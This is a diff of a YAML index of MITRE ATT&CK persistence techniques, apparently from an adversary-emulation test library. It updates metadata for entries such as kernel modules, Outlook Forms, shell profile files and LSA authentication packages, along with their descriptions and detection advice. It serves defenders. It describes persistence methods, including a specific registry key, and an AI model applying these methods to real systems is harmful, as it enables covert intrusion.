       - source_name: Synack Secure Kernel Extension Broken
-        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
         description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
           Extension Loading’ is Broken. Retrieved April 6, 2018.
+        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
       - source_name: Wikipedia Loadable Kernel Module
-        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
         description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
           April 9, 2018.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
-
-        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
-        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
-        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
-        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
-      x_mitre_detection: |
-        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
-        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
-
-        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
-      - kill_chain_name: mitre-attack
-        phase_name: privilege-escalation
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'Command: Command Execution'
-      - 'File: File Creation'
-      - 'File: File Modification'
-      - 'Kernel: Kernel Module Load'
-      - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - root
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.006
     atomic_tests:
     - name: Linux - Load Kernel Module via insmod
@@ -68742,7 +69165,7 @@ persistence:
         url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
         description: Microsoft. (2021, November 23). NtQueryInformationProcess function
           (winternl.h). Retrieved February 4, 2022.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-22T15:47:33.915Z'
       name: KernelCallbackTable
       description: |-
         Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -68768,12 +69191,10 @@ persistence:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1053.006:
     technique:
-      modified: '2023-09-08T11:56:26.862Z'
+      modified: '2024-10-15T16:42:51.536Z'
       name: 'Scheduled Task/Job: Systemd Timers'
       description: |-
         Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -68851,9 +69272,8 @@ persistence:
         url: http://man7.org/linux/man-pages/man1/systemd.1.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.006
     atomic_tests:
     - name: Create Systemd Service and Timer
@@ -68991,7 +69411,7 @@ persistence:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T02:18:19.568Z'
       name: ROMMONkit
       description: |-
         Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -69013,41 +69433,10 @@ persistence:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1137.003:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
-      type: attack-pattern
-      created: '2019-11-07T20:06:02.624Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.003
-        url: https://attack.mitre.org/techniques/T1137/003
-      - source_name: SensePost Outlook Forms
-        url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
-        description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
-          February 4, 2019.
-      - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
-        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
-          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
-          4, 2019.
-      - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
-        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
-          provides blue teams with the ability to detect Ruler usage against Exchange.
-          Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:02:00.782Z'
       name: Outlook Forms
       description: |-
         Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)
@@ -69056,22 +69445,49 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
 
         Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
       - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
+      created: '2019-11-07T20:06:02.624Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/003
+        external_id: T1137.003
+      - source_name: Microsoft Detect Outlook Forms
+        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+          4, 2019.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+      - source_name: SensePost NotRuler
+        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+          provides blue teams with the ability to detect Ruler usage against Exchange.
+          Retrieved February 4, 2019.
+        url: https://github.com/sensepost/notruler
+      - source_name: SensePost Outlook Forms
+        description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
+          February 4, 2019.
+        url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1574:
     technique:
@@ -69137,7 +69553,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.005:
     technique:
@@ -69211,11 +69626,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -69232,7 +69646,6 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -69242,7 +69655,7 @@ persistence:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -69251,19 +69664,17 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -69311,11 +69722,12 @@ persistence:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1556.006:
     technique:
-      modified: '2024-04-16T00:20:21.488Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication
       description: "Adversaries may disable or modify multi-factor authentication
         (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -69344,24 +69756,26 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Liran Ravich, CardinalOps
       - Muhammad Moiz Arshad, @5T34L7H
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Linux
       - macOS
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -69396,9 +69810,6 @@ persistence:
         url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1505.004:
     technique:
@@ -69458,7 +69869,7 @@ persistence:
         description: Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor
           on Targets in the Middle East. Retrieved July 6, 2018.
         source_name: Unit 42 RGDoor Jan 2018
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T15:06:24.161Z'
       name: IIS Components
       description: |-
         Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: <code>Get{Extension/Filter}Version</code>, <code>Http{Extension/Filter}Proc</code>, and (optionally) <code>Terminate{Extension/Filter}</code>. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)
@@ -69483,8 +69894,6 @@ persistence:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1505.004
     atomic_tests:
     - name: Install IIS Module using AppCmd.exe
@@ -69563,7 +69972,7 @@ persistence:
         name: powershell
   T1546:
     technique:
-      modified: '2024-03-01T15:49:15.588Z'
+      modified: '2024-10-15T15:57:00.731Z'
       name: Event Triggered Execution
       description: "Adversaries may establish persistence and/or elevate privileges
         using system mechanisms that trigger execution based on specific events. Various
@@ -69616,8 +70025,8 @@ persistence:
       - Windows
       - SaaS
       - IaaS
-      - Office 365
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'WMI: WMI Creation'
@@ -69665,7 +70074,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546
     atomic_tests:
     - name: Persistence with Custom AutodialDLL
@@ -69881,73 +70289,7 @@ persistence:
         elevation_required: true
   T1546.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Robert Wilson
-      - Tony Lambert, Red Canary
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
-      type: attack-pattern
-      created: '2020-01-24T14:13:45.936Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1546.004
-        url: https://attack.mitre.org/techniques/T1546/004
-      - source_name: intezer-kaiji-malware
-        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
-        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
-          turning to Golang. Retrieved December 17, 2020.'
-      - source_name: bencane blog bashrc
-        url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
-        description: Benjamin Cane. (2013, September 16). Understanding a little more
-          about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
-      - source_name: anomali-rocke-tactics
-        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
-        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
-          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
-          December 17, 2020.
-      - source_name: Linux manual bash invocation
-        url: https://wiki.archlinux.org/index.php/Bash#Invocation
-        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
-      - source_name: Tsunami
-        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
-        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
-          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
-      - source_name: anomali-linux-rabbit
-        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
-        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
-          Malware Out of a Hat. Retrieved December 17, 2020.
-      - source_name: Magento
-        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
-        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
-          Vector. Retrieved December 17, 2020.
-      - source_name: ScriptingOSX zsh
-        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
-        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
-          Files. Retrieved February 25, 2021.'
-      - source_name: PersistentJXA_leopitt
-        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
-        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
-          for macOS. Retrieved January 11, 2021.
-      - source_name: code_persistence_zsh
-        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
-        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
-          Retrieved January 11, 2021.
-      - source_name: macOS MS office sandbox escape
-        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
-        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
-          Retrieved August 20, 2021.
-      - source_name: ESF_filemonitor
-        url: https://objective-see.com/blog/blog_0x48.html
-        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
-          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-25T15:02:24.143Z'
       name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
       description: "Adversaries may establish persistence through executing malicious
         commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
@@ -69995,6 +70337,10 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Robert Wilson
+      - Tony Lambert, Red Canary
+      x_mitre_deprecated: false
       x_mitre_detection: "While users may customize their shell profile files, there
         are only certain types of commands that typically appear in these files. Monitor
         for abnormal commands such as execution of unknown programs, opening network
@@ -70005,9 +70351,13 @@ persistence:
         events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
         most Linux and macOS systems, a list of file paths for valid shell options
         available on a system are located in the <code>/etc/shells</code> file.\n"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
       x_mitre_version: '2.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'File: File Creation'
@@ -70016,8 +70366,67 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+      created: '2020-01-24T14:13:45.936Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/004
+        external_id: T1546.004
+      - source_name: anomali-linux-rabbit
+        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+          Malware Out of a Hat. Retrieved December 17, 2020.
+        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+      - source_name: anomali-rocke-tactics
+        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+          December 17, 2020.
+        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+      - source_name: Linux manual bash invocation
+        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+        url: https://wiki.archlinux.org/index.php/Bash#Invocation
+      - source_name: ScriptingOSX zsh
+        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+          Files. Retrieved February 25, 2021.'
+        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+      - source_name: bencane blog bashrc
+        description: Benjamin Cane. (2013, September 16). Understanding a little more
+          about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+        url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+      - source_name: macOS MS office sandbox escape
+        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+          Retrieved August 20, 2021.
+        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+      - source_name: Magento
+        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+          Vector. Retrieved December 17, 2020.
+        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+      - source_name: Tsunami
+        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+      - source_name: PersistentJXA_leopitt
+        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+          for macOS. Retrieved January 11, 2021.
+        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+      - source_name: code_persistence_zsh
+        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+          Retrieved January 11, 2021.
+        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+      - source_name: ESF_filemonitor
+        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+        url: https://objective-see.com/blog/blog_0x48.html
+      - source_name: intezer-kaiji-malware
+        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+          turning to Golang. Retrieved December 17, 2020.'
+        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.004
     atomic_tests:
     - name: Add command to .bash_profile
@@ -70203,7 +70612,7 @@ persistence:
         Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
 
         Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\</code> with the key value of <code>"Authentication Packages"=&lt;target binary&gt;</code>. The binary will then be executed by the system when the authentication packages are loaded.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:29:36.291Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Authentication Package
       x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -70226,7 +70635,6 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.002
     atomic_tests:
     - name: Authentication Package
@@ -70249,7 +70657,7 @@ persistence:
         elevation_required: true
   T1546.015:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:34:29.402Z'
       name: 'Event Triggered Execution: Component Object Model Hijacking'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by hijacked references to Component Object Model (COM) objects.
@@ -70327,7 +70735,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.015
     atomic_tests:
     - name: COM Hijacking - InprocServer32
@@ -70470,36 +70877,7 @@ persistence:
         name: powershell
   T1137.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
-      type: attack-pattern
-      created: '2019-11-07T20:09:56.536Z'
